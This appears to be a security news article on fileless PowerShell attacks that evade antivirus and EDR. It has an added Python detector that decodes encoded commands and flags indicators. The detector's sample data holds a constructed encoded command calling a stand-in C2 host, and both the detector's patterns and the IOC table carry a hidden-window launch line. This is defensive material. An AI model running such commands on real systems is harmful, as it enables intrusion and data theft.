Cybersecurity researchers have uncovered a recent wave of attacks in which threat actors are leveraging Microsoft PowerShell to stealthily bypass both traditional antivirus (AV) and advanced Endpoint Detection and Response (EDR) solutions.
The attackers’ approach demonstrates the increasing prevalence and sophistication of so-called “living-off-the-land” techniques, which rely on native system utilities to carry out malicious actions while blending in with legitimate processes.
Attackers Leverage Living-off-the-Land Techniques
The attackers employ highly obfuscated PowerShell scripts that are executed directly in memory, thereby minimizing their footprint on disk and evading signature-based detection mechanisms.
According to the report, these PowerShell payloads are often delivered via spear-phishing emails, malicious macros, or weaponized documents that exploit unpatched vulnerabilities in commonly used software.
Once executed, the scripts utilize advanced obfuscation strategies, including dynamic variable naming, encoding, and heavy use of built-in PowerShell cmdlets for decoding and execution.
This complexity makes static and heuristic analysis by AV and EDR tools significantly more challenging.
The attackers further complicate detection by leveraging “fileless” malware payloads, executing all actions in system memory, and avoiding the creation of traditional artifacts that would normally trigger security alerts.
Researchers have observed the adversaries using PowerShell to download and execute secondary payloads, establish persistence, and exfiltrate sensitive information to remote command-and-control (C2) servers.
Notably, the malicious scripts often invoke Windows Management Instrumentation (WMI), scheduled tasks, or registry modifications to ensure ongoing access even after system reboots.
This persistence, combined with lateral movement capabilities, enables attackers to silently expand their foothold within targeted networks.
Obfuscation Bypasses Security Controls
These campaigns are notable for their ability to bypass leading EDR solutions.
Attackers are leveraging newly discovered techniques to disable security telemetry or tamper with agent processes, further reducing the likelihood of detection.
In some cases, attackers employ “AMSI bypass” methods that specifically target the Antimalware Scan Interface (AMSI), which Microsoft designed to let antivirus and EDR products scan scripts in real time.
By patching or disabling AMSI functions at runtime, malicious scripts can evade thorough inspection.
Security experts emphasize that these attacks highlight the critical need for a defense-in-depth approach that includes behavioral analytics, continuous monitoring, and robust endpoint hardening.
Organizations are advised to restrict PowerShell execution through Group Policy, enforce code signing, and leverage application whitelisting.
Security teams should also monitor for anomalous PowerShell activity, such as unusual process chains, unexpected network connections, and large volumes of outbound data.
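As an added example (not code from the article or from the researchers it cites), the following Python script applies the monitoring advice above to constructed, Sysmon-style process-creation log lines: it scores the command-line switch combination shown in the IOC table, decodes a -EncodedCommand argument so that indicators hidden inside it can still be matched, and treats an Office application launching PowerShell as an unusual process chain. The log format, the sample lines, the scoring threshold and the decoded payload are constructed for this example; the domain, IP address and user-agent string are the ones from the article's IOC table.

```python
"""Flag anomalous PowerShell launches in process-creation logs (added example)."""
import base64
import binascii
import re

# Indicators from the article's IOC table (defanged dots restored).
IOC_DOMAIN = "malicious-c2.example.com"
IOC_IP = "185.220.101.35"
IOC_USER_AGENT = "Mozilla/5.0 (PowerShell)"

# Switches that are harmless alone but together form the fileless launch shape
# "powershell -nop -w hidden -enc ..." quoted in the IOC table.
SUSPICIOUS_SWITCHES = {
    "no-profile": re.compile(r"(?i)-nop(?:rofile)?\b"),
    "hidden-window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden\b"),
    "encoded-command": re.compile(r"(?i)-e(?:c|n|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}"),
    "policy-bypass": re.compile(r"(?i)-e(?:p|xecutionpolicy)\s+bypass\b"),
}
# Office binaries as a parent of PowerShell: the macro delivery chain the article describes.
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")
ENC_RE = re.compile(r"(?i)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")


def parse_log_line(line):
    """Split a constructed 'Key=Value|Key=Value' record into a dict."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def decode_encoded_command(cmdline):
    """Return the plaintext behind -EncodedCommand (base64 over UTF-16LE), or None."""
    match = ENC_RE.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def analyze(line):
    """Score one log line; a hit needs an IOC match or at least two weak signals."""
    event = parse_log_line(line)
    cmd = event.get("CommandLine", "")
    finding = {"command_line": cmd, "reasons": [], "decoded": None, "suspicious": False}
    if not event.get("Image", "").lower().endswith(("powershell.exe", "pwsh.exe")):
        return finding  # only PowerShell launches are in scope here
    finding["reasons"] = [name for name, rx in SUSPICIOUS_SWITCHES.items() if rx.search(cmd)]
    if event.get("ParentImage", "").lower().endswith(OFFICE_PARENTS):
        finding["reasons"].append("office-parent")
    finding["decoded"] = decode_encoded_command(cmd)
    # Match indicators against the visible command line AND the decoded payload.
    haystack = cmd + (finding["decoded"] or "")
    for label, ioc in (("domain", IOC_DOMAIN), ("ip", IOC_IP), ("user-agent", IOC_USER_AGENT)):
        if ioc in haystack:
            finding["reasons"].append("ioc:" + label)
    ioc_hit = any(r.startswith("ioc:") for r in finding["reasons"])
    finding["suspicious"] = ioc_hit or len(finding["reasons"]) >= 2
    return finding


def scan_logs(lines):
    """Return only the findings that crossed the threshold."""
    return [f for f in (analyze(l) for l in lines) if f["suspicious"]]


def _encode_command(plaintext):
    """Encode the way powershell.exe expects for -EncodedCommand (test data helper)."""
    return base64.b64encode(plaintext.encode("utf-16-le")).decode("ascii")


# Constructed sample data: a benign admin command, a macro-style launch carrying the
# article's C2 domain and user-agent inside its encoded argument, and a non-PowerShell process.
CONSTRUCTED_PAYLOAD = ("Invoke-WebRequest -Uri http://malicious-c2.example.com/update "
                       "-UserAgent 'Mozilla/5.0 (PowerShell)'")
PS_EXE = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_LOGS = [
    "ParentImage=C:\\Windows\\explorer.exe|Image=" + PS_EXE
    + "|CommandLine=powershell -NoProfile -Command Get-Date",
    "ParentImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE|Image="
    + PS_EXE + "|CommandLine=powershell -nop -w hidden -enc " + _encode_command(CONSTRUCTED_PAYLOAD),
    "ParentImage=C:\\Windows\\System32\\services.exe|Image=C:\\Windows\\System32\\svchost.exe"
    "|CommandLine=svchost.exe -k netsvcs",
]

if __name__ == "__main__":
    for hit in scan_logs(SAMPLE_LOGS):
        print(hit["reasons"], "->", hit["decoded"] or hit["command_line"])
```

The threshold matters: `-NoProfile` on its own is everyday administration and is deliberately left below it, while the Office parent plus hidden window plus encoded argument is reported even before the IOC match. Feeding real Sysmon Event ID 1 or Windows Security 4688 records would need only a different `parse_log_line`.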
Given the ongoing evolution of attacker tactics, particularly the abuse of trusted Windows components, cybersecurity defenders must remain vigilant and continuously adapt their detection and response strategies.
Close collaboration between blue teams, threat hunters, and incident responders is essential to counteract this rapidly developing threat landscape.
Indicators of Compromise (IOCs)
| Type | Indicator | Description |
|---|---|---|
| File Hash | e5b6a1c2f9d3a6ef7c3b1a2d4e1f2b5c | Obfuscated PowerShell script payload |
| Command Line | powershell -nop -w hidden -enc ... | Encoded PowerShell command for fileless attack |
| Domain | malicious-c2[.]example[.]com | C2 server used for data exfiltration |
| IP Address | 185.220.101.35 | Known malicious endpoint linked to campaign |
| Registry Key | HKCU\Software\Microsoft\Windows\Run\Updater | Persistence mechanism registry entry |
| Scheduled Task | \Windows\UpdateTask | Malicious scheduled task for script execution |
| User-Agent String | Mozilla/5.0 (PowerShell) | Unusual user-agent observed in C2 communication |